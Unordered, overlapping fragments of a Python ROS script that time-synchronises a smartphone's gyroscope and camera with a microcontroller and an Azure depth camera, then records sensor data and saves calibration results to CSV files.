"False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back')",
": M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join( (path, 'debug_data.csv') ), index=False)",
"dat = data.header.stamp.secs + data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y,",
"\"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time -",
"True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to",
"Added for debugging path = '/'.join( ('out', 'master', time.strftime(\"%m(%b)%d_%Y_%H%M%S\")) ) os.mkdir(path) #imu_data_frame =",
"str(sequence_num)) print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister()",
"gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration +",
"depth_cam_ts = None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def",
"index=False) #debug_data_frame.to_csv('/'.join( (path, 'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface",
"from sensor_msgs.msg import Imu, CameraInfo, TimeReference import numpy as np import pandas as",
"'\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string +",
"# Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\",
"For instance, 10.30.65.166' sys.exit() global HOST HOST = args[1] # Register SIGINT handler",
"- sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment",
"1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate the next sequence')",
"or time_sync2.calibration_is_succeeded is None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit()",
"1 main_duration = 4 end_duration = 4 # Wait to avoid shaking time.sleep(1)",
"alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" + str(mcu_desired_ts)).split())#subpr_list.append(align_camera_subprocess) align_camera_subprocess.wait() # Some time",
"needed to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message",
"= (sm_gyro_time[0] - mcu_gyro_time[0] + comp_delay2) # Show mean of omegas to visually",
"time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time)",
"sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset =",
"shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it is enough') mcu_imu_listener.unregister() print_master('AAA') _, sm_ascii_gyro_data, _",
"StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl #mpl.use('TkAgg') import matplotlib.pyplot as",
"bcolors.OKGREEN + 'MASTER MESSAGE: ' + string + bcolors.ENDC) def print_master_error(string): print(bcolors.BOLD +",
"str(sequence_num)) print_master('Tap Enter to indicate the next sequence') while True: input = select.select([sys.stdin],",
"if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common =",
"main(args): if len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166'",
"print_master('Tap Enter to indicate the next sequence') time.sleep(0.01); #remote.stop_video() #remote.close() #mcu_cam_listener.unregister() #publisher_depth_to_mcu_offset.unregister() if",
"OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD",
"send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording",
"global depth_cam_ts depth_cam_ts = data.header.stamp def mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts",
"min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\",
"alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send",
"import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg import Imu, CameraInfo, TimeReference import",
"print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \", sm_frame_period print \"np.mean(sm_gyro_time - mcu_gyro_time)\", np.mean(sm_gyro_time",
"time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \"",
"sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate",
"# Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset =",
"mcu_gyro_time)\", np.mean(sm_gyro_time - mcu_gyro_time) print \"sm_gyro_time[0] \", sm_gyro_time[0] print \"sm_gyro_time[-1] \", sm_gyro_time[-1] print",
"# 1. Twist-n-Sync start_duration = 1 main_duration = 4 end_duration = 4 #",
"resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) + comp_delay2 #sm_mcu_clock_offset = (sm_gyro_time[0] -",
"= True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter",
"remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0]",
"WARNING = '\\033[93m' FAIL = '\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE",
"while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if",
"'--') plt.show() plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo,",
"mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq == 1: global depth_cam_ts depth_cam_ts =",
"recording along with everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process",
"depth_cam_ts global mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None",
"mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input() # Start",
"mcu_cam_ts_common #msg.time_ref = depth_cam_ts msg.source = str(sequence_num) publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence:",
"print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0]",
"pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib as mpl",
"start_duration = 1 main_duration = 4 end_duration = 4 # Wait to avoid",
"\"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts_common #msg.time_ref = depth_cam_ts",
"'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' :",
"* (start_duration + main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\",",
"raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns",
"print_master('Exiting') running_subpr_list = [] for subpr in subpr_list: if subpr is not None:",
"str(sm_mcu_clock_offset) + \\ '\\n' ) ''' # Added for debugging path = '/'.join(",
"= '\\033[4m' def print_master(string): print(bcolors.BOLD + bcolors.OKGREEN + 'MASTER MESSAGE: ' + string",
"for subpr in subpr_list: if subpr is not None: subpr.terminate() running_subpr_list.append(subpr) exit_codes =",
"'M10' : M[1,0], 'M11' : M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21'",
"failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M #",
"finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) #",
"= 0 while mcu_cam_ts == None or depth_cam_ts == None: time.sleep(time_sleep_duration) time_past +=",
"#flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap",
"sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync",
"# Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1) #",
"# Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts",
"= RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split())",
"\"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' + str(sm_remote_ts) +",
": M[1,1], 'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' :",
"sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y',",
"input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value",
"mcu_desired_ts = sm_remote_ts - sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \",",
"+= time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close()",
"HOST = None # The smartphone's IP address class bcolors: HEADER = '\\033[95m'",
"+ str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n'",
"camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to mcu.cpp send_offset_subprocess",
"str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ',' + str(sm_mcu_clock_offset) + \\ '\\n' )",
"'debug_data.csv') ), index=False) # Phase alignment align_camera_subprocess = subprocess.Popen((\"rosrun mcu_interface align_mcu_cam_phase_client \" +",
"pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time',",
"process') input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if",
"'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' :",
"open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2)",
"os.mkdir(path) #imu_data_frame = pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1),",
"reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id",
"sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2",
"TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU",
"MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started. Wait,",
"mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration) #rospy.signal_shutdown('it",
"None: print('IMU data calibration failed. Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay",
"Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id =",
"align_camera_subprocess.wait() # Some time needed to get camrera frame data by mcu.cpp time.sleep(0.1)",
"select import os HOST = None # The smartphone's IP address class bcolors:",
"send_offset_subprocess = subprocess.Popen((\"rosrun mcu_interface publish_s10_to_mcu_offset_client \" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data",
"publisher_indicator.publish(msg) sequence_num += 1 print_master('Current sequence: ' + str(sequence_num)) print_master('Tap Enter to indicate",
"alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip()",
"/ 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if data.header.seq",
"M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time - mcu_gyro_time) +",
"# Show mean of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data,",
"depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg = TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref =",
"= 1 main_duration = 4 end_duration = 4 # Wait to avoid shaking",
"#mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback) time.sleep(start_duration) print_master('Start shaking') time.sleep(main_duration) print_master('Put back') time.sleep(end_duration)",
"to get camrera frame data by mcu.cpp time.sleep(0.1) # Send publish_s10_timestamp message to",
"import numpy as np import pandas as pd from io import StringIO from",
"everything and exit') publisher_indicator = rospy.Publisher('/sequences_ts', TimeReference, latch=True, queue_size=10) #flag_to_process = True sequence_num",
"sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show()",
"[], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"): msg",
"'sm_y', 'sm_z'], index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' :",
"sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'],",
"launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset",
"' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data =",
"Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data) - np.asarray(mcu_imu_data)[:200].mean(axis=0) # Subtract bias",
"mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time = \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] #",
"video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period",
"record_all.sh').split()) subpr_list.append(record_subprocess) time.sleep(1) print_master('Recording is started')#\\nPress Ctrl+C to stop recording along with everything",
"remote control global remote remote = RemoteControl(HOST) # Launching ROS data collection nodes",
"# Subtract bias in addition mcu_gyro_time = np.asarray(mcu_imu_time) #print(gyro_data[:200]) # Show the problem",
"sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False",
"consequently TimeSync has succeeded if time_sync2.calibration_is_succeeded == False or time_sync2.calibration_is_succeeded is None: print('IMU",
"+ main_duration + end_duration), True, True, False) #mcu_imu_listener() mcu_imu_listener = rospy.Subscriber(\"mcu_imu\", Imu, mcu_imu_callback)",
"problem of the first measurement # Get data from s10 imu sm_df =",
"\"mcu_desired_ts \", mcu_desired_ts with open(\"out/\" + time.strftime(\"%b_%d_%Y_%H_%M_%S\") + \".txt\", \"w+\") as out: out.writelines(",
"time needed to get a camera frame and its info in mcu.cpp time.sleep(0.1)",
"plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data, axis=1), '--') plt.show() plt.pause(2) plt.close() #",
"mcu_cam_ts time_sleep_duration = 0.01 time_past = 0 while mcu_cam_ts == None or depth_cam_ts",
"#imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv( '/'.join( (path, 'imu_data.csv') ),",
"src.RemoteControl import RemoteControl from concurrent.futures import ThreadPoolExecutor import subprocess import rospy from sensor_msgs.msg",
"import os HOST = None # The smartphone's IP address class bcolors: HEADER",
"Wait until .launch launched completely time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync",
"TimeReference() msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter",
"import signal import sys import select import os HOST = None # The",
"RemoteControl(HOST) # Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess)",
"== \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration = 1 main_duration =",
"+ \".txt\", \"w+\") as out: out.writelines( 'comp_delay2,sm_remote_ts,mcu_desired_ts,sm_mcu_clock_offset\\n' + \\ str(comp_delay2) + ',' +",
"start Twist-n-Sync alignment process') input = select.select([sys.stdin], [], [], 2)[0] if input: value",
"measurement # Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data",
"next sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value",
"plt.pause(2) plt.close() # 2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener",
"as executor: print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration",
"sys.stdin.readline().rstrip() if (value == \"\"): break rospy.init_node('master', anonymous=True) # 1. Twist-n-Sync start_duration =",
"+ \\ str(comp_delay2) + ',' + str(sm_remote_ts) + ',' + str(mcu_desired_ts) + ','",
"sequence') while True: input = select.select([sys.stdin], [], [], 0.01)[0] if input: value =",
"2. Azure camera alignment depth_cam_listener = rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference,",
"to get a camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset =",
"string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts",
"frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True, queue_size=10)",
"of omegas to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time -",
"\\ '\\n' ) ''' # Added for debugging path = '/'.join( ('out', 'master',",
"latch=True, queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' +",
"False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and consequently TimeSync has",
"time.sleep(2) while True: print_master('Tap Enter to start Twist-n-Sync alignment process') input = select.select([sys.stdin],",
"# Get data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data =",
"'\\033[94m' OKCYAN = '\\033[96m' OKGREEN = '\\033[92m' WARNING = '\\033[93m' FAIL = '\\033[91m'",
"None: time.sleep(time_sleep_duration) time_past += time_sleep_duration if time_past == 3: print('Timeout reached. Exiting') mcu_cam_listener.unregister()",
": [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0],",
"= [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts = None mcu_cam_ts =",
"mcu_cam_callback(data): if data.header.seq == 12: global mcu_cam_ts mcu_cam_ts = data.header.stamp global mcu_cam_ts_common mcu_cam_ts_common",
"depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to mcu via",
"to visually oversee sync performance plt.ion() plt.plot(mcu_gyro_time, np.linalg.norm(mcu_gyro_data, axis=1)) plt.plot(sm_gyro_time - sm_mcu_clock_offset, np.linalg.norm(sm_gyro_data,",
"data.header.stamp.nsecs / 1e9 mcu_imu_time.append(dat) dat = data.angular_velocity mcu_imu_data.append([dat.x, dat.y, dat.z]) def depth_cam_callback(data): if",
"- sm_mcu_clock_offset ''' # Save some info print \"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\",",
"\"comp_delay2 \", comp_delay2 print \"sm_mcu_clock_offset\", sm_mcu_clock_offset print \"sm_remote_ts \", sm_remote_ts #print \"sm_frame_period \",",
"pandas as pd from io import StringIO from src.TimeSync import TimeSync2 import matplotlib",
"# Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) #",
"'M12' : M[1,2], 'M20' : M[2,0], 'M21' : M[2,1], 'M22' : M[2,2] }).to_csv('/'.join(",
"print_master('IMUs gathering started. Wait, please') future = executor.submit(remote.get_imu, 1000 * (start_duration + main_duration",
"queue_size=10) #flag_to_process = True sequence_num = 1 print_master('Current sequence number: ' + str(sequence_num))",
"= select.select([sys.stdin], [], [], 0.01)[0] if input: value = sys.stdin.readline().rstrip() if (value ==",
"'\\033[91m' ENDC = '\\033[0m' BOLD = '\\033[1m' UNDERLINE = '\\033[4m' def print_master(string): print(bcolors.BOLD",
"sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp mcu_desired_ts = sm_remote_ts",
"Starting smartphone remote control global remote remote = RemoteControl(HOST) # Launching ROS data",
"(path, 'imu_data.csv') ), header=['mcu_time', 'mcu_x', 'mcu_y', 'mcu_z', 'sm_time', 'sm_x', 'sm_y', 'sm_z'], index=False )",
"value = sys.stdin.readline().rstrip() if (value == \"\"): msg = TimeReference() #msg.header.frame_id = \"mcu_depth_ts\"",
"future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data = np.asarray(mcu_imu_data)",
"data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch",
"msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to start recording') raw_input()",
"3: print('Timeout reached. Exiting') mcu_cam_listener.unregister() publisher_depth_to_mcu_offset.unregister() depth_cam_listener.unregister() remote.close() sys.exit() depth_cam_listener.unregister() #mcu_cam_listener.unregister() msg =",
"= subprocess.Popen(\"rosrun mcu_interface start_mcu_cam_trigger_client\".split())#subpr_list.append(cam_align_subprocess) cam_align_subprocess.wait() # Some time needed to get a camera",
"pd.DataFrame(np.vstack((t, data, t, data)).T) #imu_data_frame.to_csv( print(mcu_gyro_time.shape, mcu_gyro_data.shape, sm_gyro_time.shape, sm_gyro_data.shape) pd.DataFrame(np.hstack((mcu_gyro_time.reshape(-1,1), mcu_gyro_data, sm_gyro_time.reshape(-1,1), sm_gyro_data))).to_csv(",
"index=False ) #debug_data_frame = pd.DataFrame.from_dict({ pd.DataFrame.from_dict({ 'comp_delay2' : [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period'",
"len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit() global",
"global mcu_cam_ts_common mcu_cam_ts_common = data.header.stamp def main(args): if len(args) == 1: print 'Please,",
"/ 1e9 # Equalize lengths min_length = min(sm_gyro_time.shape[0], mcu_gyro_time.shape[0]) mcu_gyro_data, mcu_gyro_time, sm_gyro_data, sm_gyro_time",
"Launching ROS data collection nodes launch_subprocess = subprocess.Popen(\"roslaunch data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait",
"_ = future.result() print_master('IMUs gathering finished') # Get data from mcu imu mcu_gyro_data",
"print_master('AAA') _, sm_ascii_gyro_data, _ = future.result() print_master('IMUs gathering finished') # Get data from",
": [comp_delay2], 'sm_remote_ts' : [sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset],",
"Exiting') remote.close() launch_subprocess.terminate() launch_subprocess.wait() sys.exit() comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute",
"rospy.Subscriber(\"/azure/depth/camera_info\", CameraInfo, depth_cam_callback) mcu_cam_listener = rospy.Subscriber(\"/mcu_cameras_ts\", TimeReference, mcu_cam_callback) # Send start_mcu_cam_triggering command to",
"select.select([sys.stdin], [], [], 2)[0] if input: value = sys.stdin.readline().rstrip() if (value == \"\"):",
"= \\ mcu_gyro_data[:min_length], mcu_gyro_time[:min_length], \\ sm_gyro_data[:min_length], sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2(",
"[sm_remote_ts], 'sm_frame_period' :[sm_frame_period], 'mcu_desired_ts' : [mcu_desired_ts], 'sm_mcu_clock_offset' : [sm_mcu_clock_offset], 'M00' : M[0,0], 'M01'",
"msg.header.frame_id = \"mcu_depth_ts\" msg.header.stamp = mcu_cam_ts#[0] msg.time_ref = depth_cam_ts#[0] publisher_depth_to_mcu_offset.publish(msg) print_master('Tap Enter to",
"to start recording') raw_input() # Start video on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video()",
"if len(args) == 1: print 'Please, provide smartphone IP-address. For instance, 10.30.65.166' sys.exit()",
"on s10 sm_remote_ts_ns, sm_frame_period_ns = remote.start_video() sm_remote_ts = sm_remote_ts_ns / 1e9; sm_frame_period =",
"comp_delay2 = time_sync2.time_delay M = time_sync2.M # Compute resulting offset sm_mcu_clock_offset = np.mean(sm_gyro_time",
"+ bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data = [] depth_cam_ts =",
"1 print_master('Current sequence number: ' + str(sequence_num)) print_master('Tap Enter to indicate the next",
"ERROR: ' + string + bcolors.ENDC) subpr_list = [] mcu_imu_time = [] mcu_imu_data",
"data_collection data_collection_ns.launch\".split()) subpr_list.append(launch_subprocess) # Wait until .launch launched completely time.sleep(2) while True: print_master('Tap",
"data from s10 imu sm_df = pd.read_csv(StringIO(unicode(sm_ascii_gyro_data)), header=None, index_col=False) sm_gyro_data = sm_df.iloc[1:, :3].to_numpy()",
"running_subpr_list.append(subpr) exit_codes = [p.wait() for p in running_subpr_list] if remote is not None:",
"camera frame and its info in mcu.cpp time.sleep(0.1) publisher_depth_to_mcu_offset = rospy.Publisher('/depth_to_mcu_offset', TimeReference, latch=True,",
"Gathering MCU and smartphone IMU data with ThreadPoolExecutor(max_workers=1) as executor: print_master('IMUs gathering started.",
"sm_gyro_data, mcu_gyro_time, sm_gyro_time, False ) time_sync2.resample(accuracy=1) time_sync2.obtain_delay() # Check if IMU calibration and",
"sm_remote_ts_ns / 1e9; sm_frame_period = sm_frame_period_ns / 1e9 # Compute mcu desired timestamp",
"\" + str(sm_mcu_clock_offset)).split())#subpr_list.append(send_offset_subprocess) send_offset_subprocess.wait() # 3. Record data record_subprocess = subprocess.Popen(('rosrun data_collection record_all.sh').split())",
"None mcu_cam_ts = None mcu_cam_ts_common = None remote = None def mcu_imu_callback(data): dat",
"sm_gyro_time[:min_length] # Obtain offset time_sync2 = TimeSync2( mcu_gyro_data, sm_gyro_data, mcu_gyro_time, sm_gyro_time, False )",
